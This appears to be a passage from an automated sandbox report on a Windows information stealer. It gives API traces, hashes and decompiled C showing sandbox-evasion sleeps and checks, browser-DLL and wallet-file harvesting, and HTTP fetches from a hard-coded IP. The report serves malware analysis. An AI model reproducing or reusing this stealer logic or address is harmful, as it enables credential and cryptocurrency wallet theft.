                                                                                • CreateThread.KERNEL32(00000000,00000000,0040AAB2,?,00000000,00000000), ref: 0040C258
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040C263
                                                                                • CloseHandle.KERNEL32(?), ref: 0040C279
                                                                                • SetCurrentDirectoryA.KERNEL32(C:\ProgramData), ref: 0040C2A4
                                                                                • SHFileOperation.SHELL32(?), ref: 0040C2F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Directory$Create$lstrcat$Current$Heap$H_prolog3Sleep$AllocBinaryCryptProcessStringThread_memmove$CloseErrorFileH_prolog3_HandleInfoLastLibraryLoadMutexNameOperationSystemUser__localtime64_s__time64
                                                                                • String ID: $!$"$#$%$(C$(C$*.*$.zip$94.130.174.62$C:\ProgramData$ERROR$\files$\files\$\files\Wallets$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$freebl3.dll$http://$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$sqlite3.dll$vcruntime140.dll
                                                                                • API String ID: 2725794071-3608671108
                                                                                • Opcode ID: d3d26d4c8b558181d7554e1ba9c54bca0f5ba82da3f13b18b682730cef3efd24
                                                                                • Instruction ID: 10509071814e3c3b4c26833c59f8d18b50ec90d40b73f461b6d3ba6d587295fb
                                                                                • Opcode Fuzzy Hash: d3d26d4c8b558181d7554e1ba9c54bca0f5ba82da3f13b18b682730cef3efd24
                                                                                • Instruction Fuzzy Hash: 8072A3B14093809FE734EB65D945B9B7BA8EB85304F00083EF589A71D2DB789944CB6F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 88%
                                                                                			E0040C3FE(intOrPtr __ebx, intOrPtr __edx, void* __fp0) {
                                                                                				signed int _v8;
                                                                                				struct _SYSTEMTIME _v24;
                                                                                				intOrPtr* _v28;
                                                                                				signed int _v36;
                                                                                				char _v40;
                                                                                				signed int _v44;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t17;
                                                                                				signed char _t26;
                                                                                				void* _t28;
                                                                                				intOrPtr _t40;
                                                                                				void* _t41;
                                                                                				intOrPtr _t45;
                                                                                				struct HINSTANCE__* _t46;
                                                                                				char* _t47;
                                                                                				long _t49;
                                                                                				intOrPtr* _t50;
                                                                                				long _t51;
                                                                                				signed int _t53;
                                                                                				void* _t58;
                                                                                
                                                                                				_t58 = __fp0;
                                                                                				_t45 = __edx;
                                                                                				_t40 = __ebx;
                                                                                				_t17 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t17 ^ _t53;
                                                                                				_t46 = LoadLibraryA("kernel32.dll");
                                                                                				_t54 = _t46;
                                                                                				if(_t46 != 0) {
                                                                                					 *0x44a038 = GetProcAddress(_t46, "Sleep");
                                                                                					 *0x44a048 = GetProcAddress(_t46, "GetSystemTime");
                                                                                				}
                                                                                				_t49 = 0x10;
                                                                                				Sleep(_t49); // executed
                                                                                				Sleep(_t49); // executed
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				E0040C372(_t45, _t46, _t54);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				E0040C372(_t45, _t46, _t54);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				_v44 = _v44 | 0xffffffff;
                                                                                				_t47 =  &_v40;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				_v28 =  &_v44;
                                                                                				_t50 = _v28;
                                                                                				asm("cpuid");
                                                                                				 *_t50 = 1;
                                                                                				 *((intOrPtr*)(_t50 + 4)) = _t40;
                                                                                				 *((intOrPtr*)(_t50 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t50 + 0xc)) = _t45;
                                                                                				_t41 = _t40;
                                                                                				_t26 = _v36 >> 0x1f;
                                                                                				_t51 = 0x10;
                                                                                				_t55 = _t26 & 0x00000001;
                                                                                				if((_t26 & 0x00000001) != 0) {
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                					GetSystemTime( &_v24);
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                					E0041F58A(_v24.wMilliseconds & 0x0000ffff);
                                                                                					_pop(0);
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                					E0041F59C(_t55);
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                				}
                                                                                				E0040C372(_t45, _t47, _t55);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				_t28 = GetCurrentProcess();
                                                                                				__imp__VirtualAllocExNuma(_t28, 0, 0x7d0, 0x3000, 0x40, 0); // executed
                                                                                				_t56 = _t28;
                                                                                				if(_t28 == 0) {
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				E00401102(0);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				E0040104C(0);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51); // executed
                                                                                				E0040B5AD(0, _t45, _t56, _t58); // executed
                                                                                				return E0041DEB4(0, _t41, _v8 ^ _t53, _t45, 0, _t51);
                                                                                			}

























                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040C415
                                                                                • GetProcAddress.KERNEL32(00000000,Sleep), ref: 0040C42D
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 0040C43A
                                                                                  • Part of subcall function 0040C372: ExitProcess.KERNEL32 ref: 0040C3EA
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C446
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C44D
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C454
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C45B
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C462
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C469
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C475
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C47C
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C483
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C48A
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C491
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C498
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C49F
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4A6
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4AD
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4B4
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4BB
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4C2
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4C9
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4D0
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4D7
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4DE
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4EA
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4F1
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C52F
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C536
                                                                                • GetSystemTime.KERNEL32(?), ref: 0040C540
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C547
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C54E
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C560
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C567
                                                                                • _rand.LIBCMT ref: 0040C56D
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C573
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C57A
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C586
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C58D
                                                                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0040C5A3
                                                                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 0040C5AA
                                                                                • ExitProcess.KERNEL32 ref: 0040C5B5
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5C1
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5C8
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5D4
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5DB
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5E2
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$Process$AddressExitProc$AllocCurrentLibraryLoadNumaSystemTimeVirtual_rand
                                                                                • String ID: GetSystemTime$Sleep$kernel32.dll
                                                                                • API String ID: 1838750863-3444385320
                                                                                • Opcode ID: d76eb9dd382dc1332bc95f8ce0d538547e1921b36f15bac26583e63813a7f503
                                                                                • Instruction ID: 6363f1592e63a850070f9e026acd34af07ec758d9a355fcb3cfe72e0293abcfc
                                                                                • Opcode Fuzzy Hash: d76eb9dd382dc1332bc95f8ce0d538547e1921b36f15bac26583e63813a7f503
                                                                                • Instruction Fuzzy Hash: 3E51AB39481924ABC7227FB5AC4D9DF7A78AF0B3557000475F60AA1160CF38569E8BAF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0040A0C4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t268;
                                                                                				intOrPtr _t273;
                                                                                				void* _t276;
                                                                                				long _t283;
                                                                                				void* _t285;
                                                                                				intOrPtr _t287;
                                                                                				intOrPtr _t288;
                                                                                				void* _t297;
                                                                                				long _t300;
                                                                                				void* _t302;
                                                                                				void* _t306;
                                                                                				void* _t311;
                                                                                				void* _t314;
                                                                                				void* _t316;
                                                                                				void* _t318;
                                                                                				void* _t319;
                                                                                				char* _t321;
                                                                                				char* _t323;
                                                                                				void* _t325;
                                                                                				char* _t337;
                                                                                				void* _t338;
                                                                                				void* _t340;
                                                                                				long _t342;
                                                                                				void* _t347;
                                                                                				void* _t377;
                                                                                				long _t383;
                                                                                				void* _t384;
                                                                                				char* _t400;
                                                                                				void* _t422;
                                                                                				void* _t425;
                                                                                				void* _t428;
                                                                                				long _t438;
                                                                                				char* _t439;
                                                                                				void* _t440;
                                                                                				void* _t441;
                                                                                				signed int _t447;
                                                                                				void* _t449;
                                                                                
                                                                                				_t447 = _t449 - 0xd94;
                                                                                				_t268 =  *0x447674; // 0x4124c941
                                                                                				 *(_t447 + 0xd98) = _t268 ^ _t447;
                                                                                				_push(0x18);
                                                                                				E00421975(E004362AF, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t447 - 0x20)) =  *((intOrPtr*)(_t447 + 0xda4));
                                                                                				 *(_t447 - 0x10) = 0;
                                                                                				 *(_t447 - 4) = 0;
                                                                                				_t273 = 0xf;
                                                                                				 *((intOrPtr*)(_t447 + 0xa0)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x9c)) = 0;
                                                                                				 *(_t447 + 0x8c) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x84)) = _t273;
                                                                                				 *(_t447 + 0x80) = 0;
                                                                                				 *(_t447 + 0x70) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0xbc)) = _t273;
                                                                                				 *(_t447 + 0xb8) = 0;
                                                                                				 *((char*)(_t447 + 0xa8)) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x30)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x2c)) = 0;
                                                                                				 *((char*)(_t447 + 0x1c)) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x4c)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x48)) = 0;
                                                                                				 *((char*)(_t447 + 0x38)) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x14)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x10)) = 0;
                                                                                				 *_t447 = 0;
                                                                                				 *(_t447 - 4) = 6;
                                                                                				 *(_t447 - 0x14) = 0;
                                                                                				_t276 = E00409F80(_t447 + 0xda8, __ecx, _t447 + 0xc4);
                                                                                				 *(_t447 - 4) = 7;
                                                                                				E0040CFB8(_t447 + 0xa8, _t276);
                                                                                				 *(_t447 - 4) = 6;
                                                                                				E00402C34(_t447 + 0xc4, 1, 0);
                                                                                				_t425 = 8;
                                                                                				_t407 = _t447 + 0xa8;
                                                                                				if(E0040D08A(_t425, _t447 + 0xa8, "https://", _t425) == 0) {
                                                                                					L2:
                                                                                					 *(_t447 - 0x14) = _t425;
                                                                                					L3:
                                                                                					_t382 = _t447 + 0xa8;
                                                                                					 *((char*)(_t447 - 0x18)) = 0x2f;
                                                                                					_t283 = E0040CFFC( *(_t447 - 0x14) + 1, _t447 + 0xa8, _t447 + 0xa8, _t447 - 0x18, 1);
                                                                                					 *(_t447 - 0x1c) = _t283;
                                                                                					_t455 = _t283 - 0xffffffff;
                                                                                					if(_t283 != 0xffffffff) {
                                                                                						_t285 = E0040C689(_t382, _t447 + 0x54, _t447 + 0xa8, _t283, 0xffffffff);
                                                                                						 *(_t447 - 4) = 9;
                                                                                						 *(_t447 - 0x10) = 2;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, _t455, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 8;
                                                                                						_t285 = _t447 + 0xc4;
                                                                                						 *(_t447 - 0x10) = 1;
                                                                                					}
                                                                                					_t427 = _t285;
                                                                                					_t412 = _t447 + 0x8c;
                                                                                					E0040CFB8(_t447 + 0x8c, _t285);
                                                                                					if(( *(_t447 - 0x10) & 0x00000002) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffffd;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000001) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffffe;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					_t383 =  *(_t447 - 0x1c);
                                                                                					_t287 =  *((intOrPtr*)(_t447 + 0xa8));
                                                                                					if(_t383 == 0xffffffff) {
                                                                                						__eflags =  *((intOrPtr*)(_t447 + 0xbc)) - 0x10;
                                                                                						if(__eflags < 0) {
                                                                                							_t287 = _t447 + 0xa8;
                                                                                						}
                                                                                						_t383 =  *(_t447 + 0xb8);
                                                                                					} else {
                                                                                						if( *((intOrPtr*)(_t447 + 0xbc)) < 0x10) {
                                                                                							_t287 = _t447 + 0xa8;
                                                                                						}
                                                                                					}
                                                                                					_t384 = _t383 + _t287;
                                                                                					_t462 =  *((intOrPtr*)(_t447 + 0xbc)) - 0x10;
                                                                                					_t288 =  *((intOrPtr*)(_t447 + 0xa8));
                                                                                					if( *((intOrPtr*)(_t447 + 0xbc)) < 0x10) {
                                                                                						_t288 = _t447 + 0xa8;
                                                                                					}
                                                                                					_push( *(_t447 - 0x24));
                                                                                					_push(_t384);
                                                                                					_push(_t288 +  *(_t447 - 0x14));
                                                                                					_push(_t447 + 0xc4);
                                                                                					 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                					 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                					 *((char*)(_t447 + 0xc4)) = 0;
                                                                                					E0040D6B9(0, _t407, _t412, _t427, _t462);
                                                                                					_t428 = _t447 + 0xc4;
                                                                                					 *(_t447 - 4) = 0xa;
                                                                                					E0040CFB8(_t447 + 0x70, _t428);
                                                                                					_t385 = _t428;
                                                                                					 *(_t447 - 4) = 6;
                                                                                					E00402C34(_t428, 1, 0);
                                                                                					if(E0040C664(_t447 + 0x8c, "#", 0) == 0xffffffff) {
                                                                                						_t297 = E0040410F(_t447 + 0x54, _t447 + 0x8c);
                                                                                						 *(_t447 - 4) = 0xc;
                                                                                						_t94 = _t447 - 0x10;
                                                                                						 *_t94 =  *(_t447 - 0x10) | 0x00000008;
                                                                                						__eflags =  *_t94;
                                                                                					} else {
                                                                                						_t297 = E0040C689(_t385, _t447 + 0xc4, _t447 + 0x8c, 0, _t295);
                                                                                						 *(_t447 - 4) = 0xb;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000004;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x8c, _t297);
                                                                                					if(( *(_t447 - 0x10) & 0x00000008) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffff7;
                                                                                						_t385 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000004) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffffb;
                                                                                						_t385 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					_t300 = E0040C664(_t447 + 0x70, ":", 0);
                                                                                					 *(_t447 - 0x1c) = _t300;
                                                                                					if(_t300 == 0xffffffff) {
                                                                                						_t385 = _t447 + 0xc4;
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, __eflags, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 0xe;
                                                                                						_t122 = _t447 - 0x10;
                                                                                						 *_t122 =  *(_t447 - 0x10) | 0x00000020;
                                                                                						__eflags =  *_t122;
                                                                                						_t302 = _t447 + 0xc4;
                                                                                					} else {
                                                                                						_t302 = E0040C689(_t385, _t447 + 0x54, _t447 + 0x70, _t300 + 1, 0xffffffff);
                                                                                						 *(_t447 - 4) = 0xd;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000010;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x38, _t302);
                                                                                					if(( *(_t447 - 0x10) & 0x00000020) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffffdf;
                                                                                						_t385 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000010) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffffef;
                                                                                						_t385 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					_t304 =  *(_t447 - 0x1c);
                                                                                					if( *(_t447 - 0x1c) == 0xffffffff) {
                                                                                						_t304 =  *(_t447 + 0x80);
                                                                                					}
                                                                                					_t306 = E0040C689(_t385, _t447 + 0x54, _t447 + 0x70, 0, _t304);
                                                                                					 *(_t447 - 4) = 0xf;
                                                                                					E0040CFB8(_t447 + 0x70, _t306);
                                                                                					_t386 = _t447 + 0x54;
                                                                                					 *(_t447 - 4) = 6;
                                                                                					E00402C34(_t447 + 0x54, 1, 0);
                                                                                					_t309 =  *(_t447 - 0x14);
                                                                                					if( *(_t447 - 0x14) <= 0) {
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, __eflags, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 0x11;
                                                                                						_t158 = _t447 - 0x10;
                                                                                						 *_t158 =  *(_t447 - 0x10) | 0x00000080;
                                                                                						__eflags =  *_t158;
                                                                                						_t311 = _t447 + 0xc4;
                                                                                					} else {
                                                                                						_t311 = E0040C689(_t386, _t447 + 0x54, _t447 + 0xa8, 0, _t309 + 0xfffffffd);
                                                                                						 *(_t447 - 4) = 0x10;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000040;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x1c, _t311);
                                                                                					if(( *(_t447 - 0x10) & 0x00000080) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffff7f;
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000040) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffffbf;
                                                                                						_t386 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					_t314 = E0040C664(_t447 + 0x8c, "?", 0);
                                                                                					 *(_t447 - 0x14) = _t314;
                                                                                					if(_t314 == 0xffffffff) {
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, __eflags, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 0x13;
                                                                                						_t187 = _t447 - 0x10;
                                                                                						 *_t187 =  *(_t447 - 0x10) | 0x00000200;
                                                                                						__eflags =  *_t187;
                                                                                						_t316 = _t447 + 0xc4;
                                                                                					} else {
                                                                                						_t316 = E0040C689(_t386, _t447 + 0x54, _t447 + 0x8c, _t314 + 1, 0xffffffff);
                                                                                						 *(_t447 - 4) = 0x12;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000100;
                                                                                					}
                                                                                					E0040CFB8(_t447, _t316);
                                                                                					if(( *(_t447 - 0x10) & 0x00000200) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffdff;
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000100) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffeff;
                                                                                						_t386 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					_t318 = _t447 + 0x8c;
                                                                                					if( *(_t447 - 0x14) == 0xffffffff) {
                                                                                						_t319 = E0040410F(_t447 + 0x54, _t318);
                                                                                						 *(_t447 - 4) = 0x15;
                                                                                						_t212 = _t447 - 0x10;
                                                                                						 *_t212 =  *(_t447 - 0x10) | 0x00000800;
                                                                                						__eflags =  *_t212;
                                                                                					} else {
                                                                                						_t319 = E0040C689(_t386, _t447 + 0xc4, _t318, 0,  *(_t447 - 0x14));
                                                                                						 *(_t447 - 4) = 0x14;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000400;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x8c, _t319);
                                                                                					if(( *(_t447 - 0x10) & 0x00000800) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffff7ff;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000400) != 0) {
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					_t321 =  *(_t447 + 0x70);
                                                                                					if( *((intOrPtr*)(_t447 + 0x84)) < 0x10) {
                                                                                						_t321 = _t447 + 0x70;
                                                                                					}
                                                                                					DeleteUrlCacheEntry(_t321); // executed
                                                                                					_t323 =  *(_t447 + 0xda8);
                                                                                					if( *((intOrPtr*)(_t447 + 0xdbc)) < 0x10) {
                                                                                						_t323 = _t447 + 0xda8;
                                                                                					}
                                                                                					DeleteUrlCacheEntry(_t323);
                                                                                					_t325 = InternetOpenA(0x43e028, 0, 0, 0, 0); // executed
                                                                                					 *(_t447 - 0x14) = _t325;
                                                                                					if( *((intOrPtr*)(_t447 + 0xdc4)) == 0) {
                                                                                						_t438 = 0x4000000;
                                                                                						0x1bb = 0x50;
                                                                                					} else {
                                                                                						_t438 = 0x4800000;
                                                                                					}
                                                                                					if( *(_t447 - 0x14) == 0) {
                                                                                						L77:
                                                                                						_push(_t447 + 0xe0);
                                                                                						goto L78;
                                                                                					} else {
                                                                                						_t337 =  *(_t447 + 0x70);
                                                                                						if( *((intOrPtr*)(_t447 + 0x84)) < 0x10) {
                                                                                							_t337 = _t447 + 0x70;
                                                                                						}
                                                                                						_t338 = InternetConnectA( *(_t447 - 0x14), _t337, 0x1bb, 0, 0, 3, _t438, 0); // executed
                                                                                						 *(_t447 - 0x24) = _t338;
                                                                                						if(_t338 == 0) {
                                                                                							L76:
                                                                                							InternetCloseHandle( *(_t447 - 0x14));
                                                                                							goto L77;
                                                                                						} else {
                                                                                							_t400 =  *(_t447 + 0x8c);
                                                                                							if( *((intOrPtr*)(_t447 + 0xa0)) < 0x10) {
                                                                                								_t400 = _t447 + 0x8c;
                                                                                							}
                                                                                							_t340 = HttpOpenRequestA(_t338, "GET", _t400, 0, 0, 0, _t438, 0); // executed
                                                                                							_t441 = _t340;
                                                                                							if(_t441 == 0) {
                                                                                								L75:
                                                                                								InternetCloseHandle( *(_t447 - 0x24));
                                                                                								goto L76;
                                                                                							} else {
                                                                                								_t342 = HttpSendRequestA(_t441, 0, 0, 0, 0); // executed
                                                                                								 *(_t447 - 0x10) = _t342;
                                                                                								 *(_t447 - 0x1c) = 0x100;
                                                                                								if(HttpQueryInfoA(_t441, 0x13, _t447 + 0xc98, _t447 - 0x1c, 0) != 0) {
                                                                                									_push(_t447 + 0xc98);
                                                                                									_t347 = E0041F2F3();
                                                                                									__eflags = _t347 - 0xc8;
                                                                                									if(_t347 != 0xc8) {
                                                                                										goto L70;
                                                                                									}
                                                                                									__eflags =  *(_t447 - 0x10);
                                                                                									if( *(_t447 - 0x10) != 0) {
                                                                                										InternetReadFile(_t441, _t447 + 0xe0, 0xbb7, _t447 - 0x10); // executed
                                                                                										 *((char*)(_t447 +  *(_t447 - 0x10) + 0xe0)) = 0;
                                                                                									}
                                                                                									InternetCloseHandle(_t441); // executed
                                                                                									goto L75;
                                                                                								}
                                                                                								L70:
                                                                                								_push("ERROR");
                                                                                								L78:
                                                                                								_t439 =  *((intOrPtr*)(_t447 - 0x20));
                                                                                								 *((intOrPtr*)(_t439 + 0x14)) = 0xf;
                                                                                								 *((intOrPtr*)(_t439 + 0x10)) = 0;
                                                                                								 *_t439 = 0;
                                                                                								E0040381A(_t439);
                                                                                								E00402C34(_t447, 1, 0);
                                                                                								E00402C34(_t447 + 0x38, 1, 0);
                                                                                								E00402C34(_t447 + 0x1c, 1, 0);
                                                                                								E00402C34(_t447 + 0xa8, 1, 0);
                                                                                								E00402C34(_t447 + 0x70, 1, 0);
                                                                                								E00402C34(_t447 + 0x8c, 1, 0);
                                                                                								E00402C34(_t447 + 0xda8, 1, 0);
                                                                                								 *[fs:0x0] =  *((intOrPtr*)(_t447 - 0xc));
                                                                                								_pop(_t422);
                                                                                								_pop(_t440);
                                                                                								_pop(_t377);
                                                                                								return E0041DEB4(_t439, _t377,  *(_t447 + 0xd98) ^ _t447, _t407, _t422, _t440);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t425 = 7;
                                                                                				_t407 = _t447 + 0xa8;
                                                                                				if(E0040D08A(_t425, _t447 + 0xa8, "http://", _t425) != 0) {
                                                                                					goto L3;
                                                                                				}
